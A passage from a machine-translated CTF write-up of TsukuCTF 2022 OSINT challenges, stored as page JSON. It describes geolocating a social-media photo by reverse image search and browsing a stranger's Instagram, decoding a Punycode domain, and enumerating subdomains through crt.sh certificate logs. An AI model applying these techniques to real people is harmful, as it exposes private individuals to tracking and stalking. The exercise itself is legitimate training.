{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-tsukushi-2022-en","result":{"data":{"markdownRemark":{"id":"0d9c3a28-60ba-5b18-8db6-9065f7b6e608","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-tsukushi-2022\">original page</a>.</p>\n</blockquote>\n<p>I participated in <a href=\"https://tsukuctf.sechack365.com/challenges\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">TsukuCTF 2022</a> and wrote up this writeup.</p>\n<p>Our ranking briefly crept into single digits, but we couldn’t hold it and finished 14th.</p>\n<p>This was also a rare occasion where we competed as team 0neP@dding, which made it especially fun.</p>\n<p>That said, it was only two of us, which felt a little lonely — time to start recruiting members soon.</p>\n<p>As usual, I’m recording the interesting problems we solved and the ones we couldn’t.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/c0d1279023367691c228981394a395c2/c1b63/image-20221023185450493.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 100%; position: relative; bottom: 0; left: 0; background-image: 
none; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/c0d1279023367691c228981394a395c2/8ac56/image-20221023185450493.webp 240w,\n/static/c0d1279023367691c228981394a395c2/d3be9/image-20221023185450493.webp 480w,\n/static/c0d1279023367691c228981394a395c2/e46b2/image-20221023185450493.webp 960w,\n/static/c0d1279023367691c228981394a395c2/92f8c/image-20221023185450493.webp 1200w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/c0d1279023367691c228981394a395c2/8ff5a/image-20221023185450493.png 240w,\n/static/c0d1279023367691c228981394a395c2/e85cb/image-20221023185450493.png 480w,\n/static/c0d1279023367691c228981394a395c2/d9199/image-20221023185450493.png 960w,\n/static/c0d1279023367691c228981394a395c2/c1b63/image-20221023185450493.png 1200w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            
src=\"/static/c0d1279023367691c228981394a395c2/d9199/image-20221023185450493.png\"\n            alt=\"image-20221023185450493\"\n            title=\"image-20221023185450493\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li>\n<p><a href=\"#osint\">OSINT</a></p>\n<ul>\n<li><a href=\"#banana\">banana</a></li>\n<li><a href=\"#tsukuctf-big-fan-2\">TsukuCTF Big Fan 2</a></li>\n<li><a href=\"#utsukushii\">uTSUKUSHIi</a></li>\n</ul>\n</li>\n<li>\n<p><a href=\"#misc\">Misc</a></p>\n<ul>\n<li><a href=\"#lucky-number-777\">Lucky Number 777</a></li>\n<li><a href=\"#soder\">soder</a></li>\n<li><a href=\"#nako3ndbox\">nako3ndbox</a></li>\n</ul>\n</li>\n<li><a href=\"#wrap-up\">Wrap-up</a></li>\n</ul>\n<h2 id=\"osint\" style=\"position:relative;\"><a href=\"#osint\" aria-label=\"osint permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 
1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>OSINT</h2>\n<h3 id=\"banana\" style=\"position:relative;\"><a href=\"#banana\" aria-label=\"banana permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>banana</h3>\n<p>The challenge was:</p>\n<blockquote>\n<p>Tsukushi is looking at a girl’s social media account. He says: “I want to figure out where this photo was taken so I can go there and take the same shot!”</p>\n<p>Help Tsukushi identify the location. <em>The flag format is TsukuCTF22{latitude_longitude}. 
Latitude and longitude should be in decimal notation, truncated to 5 decimal places.</em></p>\n</blockquote>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 828px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7f194810f97eaccf9f5e299d18fa30a0/b2cd5/banana.jpg\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 99.16666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/jpeg;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7f194810f97eaccf9f5e299d18fa30a0/8ac56/banana.webp 240w,\n/static/7f194810f97eaccf9f5e299d18fa30a0/d3be9/banana.webp 480w,\n/static/7f194810f97eaccf9f5e299d18fa30a0/712de/banana.webp 828w\"\n              sizes=\"(max-width: 828px) 100vw, 828px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7f194810f97eaccf9f5e299d18fa30a0/09b79/banana.jpg 240w,\n/static/7f194810f97eaccf9f5e299d18fa30a0/7cc5e/banana.jpg 480w,\n/static/7f194810f97eaccf9f5e299d18fa30a0/b2cd5/banana.jpg 828w\"\n            sizes=\"(max-width: 828px) 100vw, 828px\"\n            type=\"image/jpeg\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7f194810f97eaccf9f5e299d18fa30a0/b2cd5/banana.jpg\"\n            alt=\"banana\"\n            title=\"banana\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I tried cropping out the banana mascot in the background and reverse-searching it, but couldn’t find anything 
for a while. Eventually, narrowing the search to Instagram turned up the account of a homemaker who used this image as her icon.</p>\n<p>Browsing through her personal photos revealed that the wall in the background is at the location of the Tamuning morning market in Guam, and I was able to get the Flag.</p>\n<h3 id=\"tsukuctf-big-fan-2\" style=\"position:relative;\"><a href=\"#tsukuctf-big-fan-2\" aria-label=\"tsukuctf big fan 2 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>TsukuCTF Big Fan 2</h3>\n<blockquote>\n<p>The problem:\nHe appears to be running a website.</p>\n</blockquote>\n<p>In the previous challenge “TsukuCTF Big Fan 1”, I found through his Twitter account that he runs a website and publishes it at the address indicated by the cipher <code class=\"language-text\">ctf 073b6d com</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 592px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/dea810b2acdd7b6c6bd6da9a4d5eb877/1b853/image-20221023190359304.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n      
    <source\n              srcset=\"/static/dea810b2acdd7b6c6bd6da9a4d5eb877/8ac56/image-20221023190359304.webp 240w,\n/static/dea810b2acdd7b6c6bd6da9a4d5eb877/d3be9/image-20221023190359304.webp 480w,\n/static/dea810b2acdd7b6c6bd6da9a4d5eb877/0be55/image-20221023190359304.webp 592w\"\n              sizes=\"(max-width: 592px) 100vw, 592px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/dea810b2acdd7b6c6bd6da9a4d5eb877/8ff5a/image-20221023190359304.png 240w,\n/static/dea810b2acdd7b6c6bd6da9a4d5eb877/e85cb/image-20221023190359304.png 480w,\n/static/dea810b2acdd7b6c6bd6da9a4d5eb877/1b853/image-20221023190359304.png 592w\"\n            sizes=\"(max-width: 592px) 100vw, 592px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/dea810b2acdd7b6c6bd6da9a4d5eb877/1b853/image-20221023190359304.png\"\n            alt=\"image-20221023190359304\"\n            title=\"image-20221023190359304\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The numbers looked like Leet-cipher substitutions, so I wrote the following script to brute-force plausible combinations.</p>\n<p>However, none of the patterns resolved to a reachable address, and I gave up.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> requests\n\nurls <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span>\n<span class=\"token keyword\">for</span> a <span class=\"token keyword\">in</span> <span class=\"token punctuation\">(</span><span class=\"token string\">\"0\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"o\"</span><span class=\"token punctuation\">,</span> <span class=\"token 
string\">\"o\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"oh\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"p\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">for</span> b <span class=\"token keyword\">in</span> <span class=\"token punctuation\">(</span><span class=\"token string\">\"7\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"t\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"l\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"y\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">for</span> c <span class=\"token keyword\">in</span> <span class=\"token punctuation\">(</span><span class=\"token string\">\"3\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"e\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n            <span class=\"token keyword\">for</span> d <span class=\"token keyword\">in</span> <span class=\"token punctuation\">(</span><span class=\"token string\">\"8\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"b\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"6\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"i3\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"13\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n                <span class=\"token keyword\">for</span> e <span class=\"token keyword\">in</span> <span class=\"token punctuation\">(</span><span class=\"token string\">\"6\"</span><span class=\"token punctuation\">,</span> <span class=\"token 
string\">\"g\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"b\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n                    <span class=\"token keyword\">for</span> f <span class=\"token keyword\">in</span> <span class=\"token punctuation\">(</span><span class=\"token string\">\"d\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"i7\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"17\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n                        s <span class=\"token operator\">=</span> a <span class=\"token operator\">+</span> b <span class=\"token operator\">+</span> c <span class=\"token operator\">+</span> d <span class=\"token operator\">+</span> e <span class=\"token operator\">+</span> f\n                        url <span class=\"token operator\">=</span> <span class=\"token string\">\"http://ctf.{}.com/\"</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">format</span><span class=\"token punctuation\">(</span>s<span class=\"token punctuation\">)</span>\n                        urls<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># For test</span>\nurls<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"https://google.com/\"</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">for</span> url <span class=\"token keyword\">in</span> urls<span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span>\n        res <span 
class=\"token operator\">=</span> requests<span class=\"token punctuation\">.</span>get<span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">,</span> timeout<span class=\"token operator\">=</span><span class=\"token number\">5</span><span class=\"token punctuation\">)</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>res<span class=\"token punctuation\">.</span>status_code<span class=\"token punctuation\">)</span>\n        <span class=\"token keyword\">break</span>\n    <span class=\"token keyword\">except</span> requests<span class=\"token punctuation\">.</span>RequestException<span class=\"token punctuation\">:</span>\n        <span class=\"token comment\"># Host did not resolve or connect; try the next candidate</span>\n        <span class=\"token keyword\">pass</span></code></pre></div>\n<p>Looking at the following writeup, the hint was hidden in a different tweet by the same person.</p>\n<p>Reference: <a href=\"https://nanimokangaeteinai.hateblo.jp/entry/2022/10/23/180703\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">TsukuCTF 2022 writeup - st98’s diary</a></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/a9efa107f1625daabd79328424027d3e/fcda8/image-20221023191049064.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 20.833333333333336%; position: relative; bottom: 0; left: 0; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/a9efa107f1625daabd79328424027d3e/8ac56/image-20221023191049064.webp 
240w,\n/static/a9efa107f1625daabd79328424027d3e/d3be9/image-20221023191049064.webp 480w,\n/static/a9efa107f1625daabd79328424027d3e/5ca24/image-20221023191049064.webp 590w\"\n              sizes=\"(max-width: 590px) 100vw, 590px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/a9efa107f1625daabd79328424027d3e/8ff5a/image-20221023191049064.png 240w,\n/static/a9efa107f1625daabd79328424027d3e/e85cb/image-20221023191049064.png 480w,\n/static/a9efa107f1625daabd79328424027d3e/fcda8/image-20221023191049064.png 590w\"\n            sizes=\"(max-width: 590px) 100vw, 590px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/a9efa107f1625daabd79328424027d3e/fcda8/image-20221023191049064.png\"\n            alt=\"image-20221023191049064\"\n            title=\"image-20221023191049064\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Here, “xn” refers to the <code class=\"language-text\">ACE (ASCII Compatible Encoding)</code> prefix used in <code class=\"language-text\">internationalized domain names</code> expressed in Punycode. 
(Labels with ACE are called “A-labels”.)</p>\n<p>Punycode is an encoding scheme that converts hostnames containing Unicode characters into strings composed only of letters, digits, and hyphens (a subset of ASCII), enabling Unicode-expressed hostnames such as Japanese domain names to be used as Internationalized Domain Names (IDNs) in applications.</p>\n<p>Reference: <a href=\"https://en.wikipedia.org/wiki/Punycode\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Punycode - Wikipedia</a></p>\n<p>Punycode can reversibly convert Unicode strings to ASCII strings: ASCII characters are left as-is, while non-ASCII characters are converted to a unique string of alphanumerics and hyphens.</p>\n<p>In practice, prepending “xn--” to the ciphertext and decoding as Punycode yields the following domain name:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 660px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/61f96d9fc2ac5b1cfb8fd9e0da0673a1/1f083/image-20221023191904625.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 36.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/61f96d9fc2ac5b1cfb8fd9e0da0673a1/8ac56/image-20221023191904625.webp 240w,\n/static/61f96d9fc2ac5b1cfb8fd9e0da0673a1/d3be9/image-20221023191904625.webp 480w,\n/static/61f96d9fc2ac5b1cfb8fd9e0da0673a1/cc661/image-20221023191904625.webp 660w\"\n              sizes=\"(max-width: 660px) 100vw, 660px\"\n              type=\"image/webp\"\n            />\n          <source\n            
srcset=\"/static/61f96d9fc2ac5b1cfb8fd9e0da0673a1/8ff5a/image-20221023191904625.png 240w,\n/static/61f96d9fc2ac5b1cfb8fd9e0da0673a1/e85cb/image-20221023191904625.png 480w,\n/static/61f96d9fc2ac5b1cfb8fd9e0da0673a1/1f083/image-20221023191904625.png 660w\"\n            sizes=\"(max-width: 660px) 100vw, 660px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/61f96d9fc2ac5b1cfb8fd9e0da0673a1/1f083/image-20221023191904625.png\"\n            alt=\"image-20221023191904625\"\n            title=\"image-20221023191904625\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I thought that would be the answer, but accessing this domain in a browser redirects to a Rickroll.</p>\n<p>That video redirect always gives me flashbacks…</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 662px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/17b797c01a1ede69b9bea5f993b3e52d/be86f/image-20221023192107089.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 65.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/17b797c01a1ede69b9bea5f993b3e52d/8ac56/image-20221023192107089.webp 240w,\n/static/17b797c01a1ede69b9bea5f993b3e52d/d3be9/image-20221023192107089.webp 480w,\n/static/17b797c01a1ede69b9bea5f993b3e52d/90cc3/image-20221023192107089.webp 662w\"\n              
sizes=\"(max-width: 662px) 100vw, 662px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/17b797c01a1ede69b9bea5f993b3e52d/8ff5a/image-20221023192107089.png 240w,\n/static/17b797c01a1ede69b9bea5f993b3e52d/e85cb/image-20221023192107089.png 480w,\n/static/17b797c01a1ede69b9bea5f993b3e52d/be86f/image-20221023192107089.png 662w\"\n            sizes=\"(max-width: 662px) 100vw, 662px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/17b797c01a1ede69b9bea5f993b3e52d/be86f/image-20221023192107089.png\"\n            alt=\"image-20221023192107089\"\n            title=\"image-20221023192107089\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I wanted to see what was happening before the redirect, so I tried intercepting with Burp — but found nothing that pointed toward the Flag.</p>\n<p>I then searched the domain in <a href=\"https://lookup.icann.org/en\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">ICANN Lookup</a> and got some results, but nothing useful.</p>\n<p>Honestly, even if I had figured out the Punycode on my own, I would have been stuck here. 
Looking at the writeup, since TLS connections to the target domain are possible, you need to check the certificate on <a href=\"https://crt.sh/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">crt.sh</a>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/123b2afab8a5849b26da974042b0e24a/7bf07/image-20221023193626330.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 19.583333333333332%; position: relative; bottom: 0; left: 0; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/123b2afab8a5849b26da974042b0e24a/8ac56/image-20221023193626330.webp 240w,\n/static/123b2afab8a5849b26da974042b0e24a/d3be9/image-20221023193626330.webp 480w,\n/static/123b2afab8a5849b26da974042b0e24a/e46b2/image-20221023193626330.webp 960w,\n/static/123b2afab8a5849b26da974042b0e24a/d9e4a/image-20221023193626330.webp 1128w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/123b2afab8a5849b26da974042b0e24a/8ff5a/image-20221023193626330.png 240w,\n/static/123b2afab8a5849b26da974042b0e24a/e85cb/image-20221023193626330.png 
480w,\n/static/123b2afab8a5849b26da974042b0e24a/d9199/image-20221023193626330.png 960w,\n/static/123b2afab8a5849b26da974042b0e24a/7bf07/image-20221023193626330.png 1128w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/123b2afab8a5849b26da974042b0e24a/d9199/image-20221023193626330.png\"\n            alt=\"image-20221023193626330\"\n            title=\"image-20221023193626330\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I recalled getting tripped up by a crt.sh challenge before — and this time I learned that certificate registration can be a way to enumerate subdomains.</p>\n<h3 id=\"utsukushii\" style=\"position:relative;\"><a href=\"#utsukushii\" aria-label=\"utsukushii permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>uTSUKUSHIi</h3>\n<blockquote>\n<p><strong>medium</strong></p>\n<p>I found a photo of the world’s cutest cat. Please tell me this cat’s date of birth. 
The flag format is <code class=\"language-text\">TsukuCTF22{YYYY/MM/DD}</code>.</p>\n</blockquote>\n<p>This challenge gave us a photo of a cute cat.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0928039d0f0856317547d2d9a6890d97/9568a/meow.jpg\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 133.33333333333331%; position: relative; bottom: 0; left: 0; background-image: url('data:image/jpeg;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0928039d0f0856317547d2d9a6890d97/8ac56/meow.webp 240w,\n/static/0928039d0f0856317547d2d9a6890d97/d3be9/meow.webp 480w,\n/static/0928039d0f0856317547d2d9a6890d97/e46b2/meow.webp 960w,\n/static/0928039d0f0856317547d2d9a6890d97/f992d/meow.webp 1440w,\n/static/0928039d0f0856317547d2d9a6890d97/882b9/meow.webp 1920w,\n/static/0928039d0f0856317547d2d9a6890d97/e51ec/meow.webp 3024w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0928039d0f0856317547d2d9a6890d97/09b79/meow.jpg 240w,\n/static/0928039d0f0856317547d2d9a6890d97/7cc5e/meow.jpg 480w,\n/static/0928039d0f0856317547d2d9a6890d97/6a068/meow.jpg 960w,\n/static/0928039d0f0856317547d2d9a6890d97/644c5/meow.jpg 1440w,\n/static/0928039d0f0856317547d2d9a6890d97/0f98f/meow.jpg 1920w,\n/static/0928039d0f0856317547d2d9a6890d97/9568a/meow.jpg 3024w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/jpeg\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            
src=\"/static/0928039d0f0856317547d2d9a6890d97/6a068/meow.jpg\"\n            alt=\"meow\"\n            title=\"meow\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I tried reverse-searching by the cat, sofa, and so on, but couldn’t find the right photo.</p>\n<p>One of my teammates suggested “this looks like a cat café”, so we focused the search there — but that alone wasn’t narrow enough, and I gave up.</p>\n<p>Looking at the following writeup, the key was inferring the location and style of the furnishings to find Flag-relevant information. (Impressive OSINT skills…)</p>\n<p>Reference: <a href=\"https://zenn.dev/mmrz/articles/2920cf099124f3\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Participated in TsukuCTF 2022</a></p>\n<p>The technique of approaching it from the concept/theme angle was a great learning experience and worth recording.</p>\n<h2 id=\"misc\" style=\"position:relative;\"><a href=\"#misc\" aria-label=\"misc permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Misc</h2>\n<h3 id=\"lucky-number-777\" style=\"position:relative;\"><a href=\"#lucky-number-777\" aria-label=\"lucky number 777 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" 